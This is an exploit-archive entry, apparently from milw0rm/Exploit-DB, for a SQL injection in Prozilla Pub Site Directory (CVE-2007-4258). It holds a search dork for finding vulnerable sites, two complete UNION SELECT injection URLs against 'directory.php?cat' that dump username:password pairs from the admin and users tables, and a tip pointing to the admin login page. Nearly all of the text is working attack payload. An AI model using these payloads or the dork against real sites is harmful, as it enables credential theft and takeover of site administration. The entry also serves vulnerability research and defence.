Prozilla Pub Site Directory - 'Directory.php?cat' SQL Injection
Author: t0pP8uZz
type: webapps
platform: php
port:
date_added: 2007-08-05
date_updated:
verified: 1
codes: OSVDB-39197;CVE-2007-4258
tags:
aliases:
screenshot_url:
application_url:
--==+================================================================================+==--
--==+ Prozilla Pub Site Directory SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: prozilla.com
DORK: inurl:"directory.php?cat=" pubs
DESCRIPTION:
pull out users and admins login information
EXPLOITS:
http://server.com/Script_Dir/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/admin/*
http://server.com/Script_Dir/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/users/*
NOTE/TIP:
admin login at /siteadmin/
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org !
--==+================================================================================+==--
--==+ Prozilla Pub Site Directory SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# milw0rm.com [2007-08-06]